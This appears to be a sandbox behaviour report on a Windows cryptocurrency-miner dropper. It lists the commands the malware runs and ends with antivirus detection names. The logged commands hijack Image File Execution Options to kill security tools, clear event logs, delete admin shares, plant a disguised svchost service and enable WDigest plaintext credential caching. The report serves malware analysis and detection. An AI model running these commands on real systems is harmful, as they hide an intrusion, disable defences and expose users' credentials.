cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
cmdline net share e$ /delete
cmdline netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
cmdline netsh ipsec static set policy name=Aliyun assign=y
Time & API Arguments Status Return Repeated

ControlService

 service_handle: 0x005f45c0
service_name: Browser
control_code: 1
1 1 0

ControlService

 service_handle: 0x005fd950
service_name: LanmanServer
control_code: 1
1 1 0
Time & API Arguments Status Return Repeated

EnumServicesStatusW

 service_handle: 0x0000000000333a50
service_type: 59
service_status: 3
0 0
service_name MetPipAtcivator service_path c:\Windows\Fonts\svchost.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger reg_value C:\\WINDOWS\\system32\\svchost.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger reg_value taskkill.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\debugger reg_value taskkill.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\debugger reg_value taskkill.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe\debugger reg_value taskkill.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe\debugger reg_value taskkill.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe\debugger reg_value taskkill.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe\debugger reg_value taskkill.exe
cmdline reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xmrig.exe" /v "deebugger" /d taskkill.exe /f
parent_process iexplore.exe martian_process cmd /c C:\Windows\TEMP\csonhost.bat
parent_process iexplore.exe martian_process cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
cmd sc stop metpipatcivatorattrib +s +h +r c:\windows\svchost.execacls c:\windows\system32\sethc.exe /e /d servicec:\windows\fonts\svchost.exe set metpipatcivator displayname network location servicetakeown /f c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /anet stop mssecsvc2.0net stop mssecsvc2.1c:\users\test22\appdata\local\temp\tem.vbswevtutil cl "system"sc delete mssecsvc2.1sc delete graphipcs_perfsvcsattrib -s -h -r -a c:\windows\fontsnet share d$ /deletereg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\rundlls.exe" /fsc config policyagent start= autosc stop microsotmaimscacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /g administrators:rcacls c:\windows\fonts\csrss.exe /d everyoneattrib +s +h +r c:\windows\boy.exereg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\hipsdaemon.exe" /v "debugger" /d taskkill.exe /fsc stop graphipcs_perfsvcssc delete microsotmaistakeown /f c:\windows\syswow64\conhost.exe /ac:\windows\fonts\svchost.exe start metpipatcivatorreg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f taskkill /f /t /im sqlservr.execacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /d systemc:\windows\system32\net1 share f$ /deleteattrib +s +h +r c:\windows\fonts\sqlservr.exetaskkill /f /t /im boy.execacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /g users:rnetsh ipsec static del allc:\windows\system32\net1 stop lanmanserver /yc:\windows\system32\net1 share ipc$ /deletereg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\net.exe" /f c:\windows\system32\net1 share c$ /deletewevtutil cl "security" sc delete metpipatcivatornet user mm123$ /deltaskkill /f /t /im powershell.exenetsh ipsec static add filterlist name=denylistc:\windows\system32\net1 share e$ /deletec:\windows\system32\cmd.exe /s /d /c" echo y"reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\curl.exe" /v "debugger" /d taskkill.exe /fnet1 user mm123$ /delc:\windows\system32\net1 share d$ /deletecacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /d servicecacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /g administrators:fnetsh ipsec static add filterlist name=allowlistcacls c:\windows\system32\sethc.exe /e /g administrators:rcacls c:\windows\fonts\sqlservr.exe /d everyonecacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /d "network service"taskkill /f /t /im d1lhots.execacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /d servicec:\windows\fonts\svchost.exe set metpipatcivator description provides performance library information from windows management.cacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /d systemnetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138wmic process where "name='sqlservr.exe' and executablepath='c:\\windows\\fonts\\sqlservr.exe'" call terminatesc delete microsotmaimscacls c:\windows\system32\sethc.exe /e /d "network service"c:\windows\system32\cmd.exe /s /d /c" echo y"taskkill /f /t /im lsars.exe /im lsacs.exesc stop microsotmaissc delete setpipatcivatornetsh ipsec static add filteraction name=deny action=blocksc delete "application layre gateway saervice"reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\usysdiag.exe" /v "debugger" /d taskkill.exe /ftakeown /f c:\windows\system32\windowspowershell\v1.0\powershell.exe /anet share ipc$ /deletec:\windows\system32\net1 share admin$ /deletetaskkill /f /t /im dl1hots.execacls c:\windows\syswow64\conhost.exe /d everyoneattrib +s +h +r c:\windows\fonts\csrss.execacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /g users:rcacls c:\windows\system32\sethc.exe /e /g system:rsc stop "application layre gateway saervice"attrib +s +h +r c:\windows\lsass.exereg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ftp.exe" /v "debugger" /d c:\\windows\\system32\\svchost.exe /fcacls c:\windows\boy.exe /d everyonereg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f c:\windows\system32\net1 stop mssecsvc2.0c:\windows\system32\net1 stop mssecsvc2.1net share e$ /deletenetsh ipsec static add rule name=deny1 policy=aliyun filterlist=denylist filteraction=denynetsh ipsec static set policy name=aliyun assign=yreg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\certutil.exe" /v "debugger" /d taskkill.exe /fcmd /c attrib -s -h -r -a %systemroot%\fontscacls c:\windows\lsass.exe /d everyonecacls c:\windows\system32\sethc.exe /g administrators:fcacls c:\windows\system32\sethc.exe /e /g users:rsc start metpipatcivatorcacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /g administrators:fwmic process where "name='conhost.exe' and executablepath='c:\\windows\\syswow64\\conhost.exe'" call terminatesc config lanmanserver start= disabled net share f$ /deletetakeown /f c:\windows\system32\sethc.exe /ac:\windows\fonts\svchost.exe install metpipatcivator c:\windows\fonts\conhost.execacls c:\windows\system32\windowspowershell\v1.0\powershell.exe /e /d "network service"sc delete mssecsvc2.0sc stop conhostreg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ftp.exe" /v "debugger" /d taskkill.exe /fsc stop setpipatcivatorwmic process where "name='csrss.exe' and executablepath='c:\\windows\\fonts\\csrss.exe'" call terminatenetsh ipsec static add filteraction name=allow action=permitsc delete conhostcacls c:\windows\syswow64\windowspowershell\v1.0\powershell.exe /e /g administrators:rreg add hklm\system\currentcontrolset\control\securityproviders\wdigest /v uselogoncredential /t reg_dword /d 1 /f net share c$ /deletec:\windows\system32\net1 user mm123$ /delcmd /c c:\windows\temp\csonhost.batnet share admin$ /deletereg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\rundlls.exe" /f reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\xmrig.exe" /v "deebugger" /d taskkill.exe /f net stop lanmanserver /yreg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\srdsl.exe" /v "debugger" /d taskkill.exe /fwmic process where "name='svchost.exe' and executablepath='c:\\windows\\svchost.exe'" call terminatesc start policyagenttaskkill /f /t /im wscript.exenetsh ipsec static add policy name=aliyunwevtutil cl "windows powershell" reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\mshta.exe" /v "debugger" /d taskkill.exe /fcacls c:\windows\svchost.exe /d everyonetaskkill /f /t /im rundlls.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445"c:\windows\system32\wscript.exe" "c:\users\test22\appdata\local\temp\tem.vbs" ping 127.1 -n 5
parent_process iexplore.exe martian_process sc stop MetPipAtcivator
parent_process iexplore.exe martian_process sc delete mssecsvc2.1
parent_process iexplore.exe martian_process sc delete MetPipAtcivator
parent_process iexplore.exe martian_process net user mm123$ /del
parent_process iexplore.exe martian_process net stop mssecsvc2.0
parent_process iexplore.exe martian_process net stop mssecsvc2.1
parent_process iexplore.exe martian_process c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
parent_process iexplore.exe martian_process sc stop MicrosotMais
parent_process iexplore.exe martian_process sc delete mssecsvc2.0
parent_process iexplore.exe martian_process sc delete SetPipAtcivator
parent_process iexplore.exe martian_process sc stop SetPipAtcivator
parent_process iexplore.exe martian_process C:\Users\test22\AppData\Local\Temp\tem.vbs
parent_process iexplore.exe martian_process sc stop MicrosotMaims
parent_process iexplore.exe martian_process taskkill /f /t /im dl1hots.exe
parent_process iexplore.exe martian_process cmd /c C:\Windows\TEMP\csonhost.bat
parent_process iexplore.exe martian_process reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
parent_process iexplore.exe martian_process reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xmrig.exe" /v "deebugger" /d taskkill.exe /f
parent_process iexplore.exe martian_process taskkill /f /t /im d1lhots.exe
parent_process iexplore.exe martian_process reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
parent_process iexplore.exe martian_process c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
parent_process iexplore.exe martian_process sc delete MicrosotMais
parent_process iexplore.exe martian_process reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
parent_process iexplore.exe martian_process c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service
parent_process iexplore.exe martian_process reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
parent_process iexplore.exe martian_process c:\windows\Fonts\svchost.exe start MetPipAtcivator
parent_process iexplore.exe martian_process reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f
parent_process iexplore.exe martian_process net1 user mm123$ /del
parent_process iexplore.exe martian_process sc delete MicrosotMaims
parent_process iexplore.exe martian_process taskkill /f /t /im rundlls.exe
parent_process iexplore.exe martian_process cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
parent_process iexplore.exe martian_process "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\tem.vbs"
cmdline cacls C:\Windows\system32\sethc.exe /e /d SERVICE
cmdline wevtutil cl "system"
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
cmdline cacls C:\Windows\Fonts\csrss.exe /d everyone
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
cmdline wevtutil cl "security"
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
cmdline cacls C:\Windows\system32\sethc.exe /e /g Administrators:r
cmdline cacls C:\Windows\Fonts\sqlservr.exe /d everyone
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system
cmdline cacls C:\Windows\system32\sethc.exe /e /d "network service"
cmdline cacls C:\Windows\SysWOW64\conhost.exe /d everyone
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
cmdline cacls C:\Windows\system32\sethc.exe /e /g system:r
cmdline cacls C:\Windows\boy.exe /d everyone
cmdline cacls C:\Windows\lsass.exe /d everyone
cmdline cacls C:\Windows\system32\sethc.exe /g Administrators:f
cmdline cacls C:\Windows\system32\sethc.exe /e /g Users:r
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
cmdline cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
cmdline wevtutil cl "windows powershell"
cmdline cacls C:\Windows\svchost.exe /d everyone
file C:\Windows\SysWOW64\wscript.exe
Lionic Trojan.Win32.Miner.4!c
tehtris Generic.Malware
MicroWorld-eScan Generic.Dacic.1.BitCoinMiner.A.12CE9F78
FireEye Generic.mg.a3d8b7059f0a4108
McAfee Artemis!A3D8B7059F0A
Cylance Unsafe
Zillya Dropper.FlyStudio.Win32.1
Sangfor Virus.Win32.Save.a
K7AntiVirus Trojan ( 0058f6531 )
Alibaba Trojan:Win32/Coinminer.449
K7GW Trojan ( 0058f6531 )
Cybereason malicious.59f0a4
Arcabit Generic.Dacic.1.BitCoinMiner.A.12CE9F78
BitDefenderTheta Gen:NN.ZexaF.36276.8pKfaC5bmGlb
Cyren W32/ABRisk.ZBIN-2175
Symantec ML.Attribute.HighConfidence
Elastic malicious (moderate confidence)
ESET-NOD32 a variant of Win32/TrojanDropper.FlyStudio.CO
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.Win32.Miner.gen
BitDefender Generic.Dacic.1.BitCoinMiner.A.12CE9F78
NANO-Antivirus Trojan.Win32.Miner.jusrbx
Avast FileRepMalware [Misc]
Tencent Risktool.Win64.Bitminer.16000063
Emsisoft Generic.Dacic.1.BitCoinMiner.A.12CE9F78 (B)
F-Secure Heuristic.HEUR/AGEN.1254285
DrWeb Tool.Nssm.2
VIPRE Generic.Dacic.1.BitCoinMiner.A.12CE9F78
TrendMicro TROJ_GEN.R002C0DB523
McAfee-GW-Edition BehavesLike.Win32.Flyagent.wc
Trapmine malicious.high.ml.score
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
Avira HEUR/AGEN.1254285
Antiy-AVL Trojan/Win32.FlyStudio.a
Gridinsoft Ransom.Win32.Wacatac.sa
Xcitium Packed.Win32.MUPX.Gen@24tbus
Microsoft Trojan:Win32/CoinMiner!MTB
ZoneAlarm not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.gen
GData Win32.Trojan.PSE.10TFD8O
Google Detected
AhnLab-V3 Malware/Win32.Generic.C1805593
VBA32 Trojan.Agentb
ALYac Generic.Dacic.1.BitCoinMiner.A.12CE9F78
MAX malware (ai score=80)
Malwarebytes Trojan.FlyStudio
TrendMicro-HouseCall TROJ_GEN.R002C0DB523
Rising HackTool.NSSM!1.CABB (CLOUD)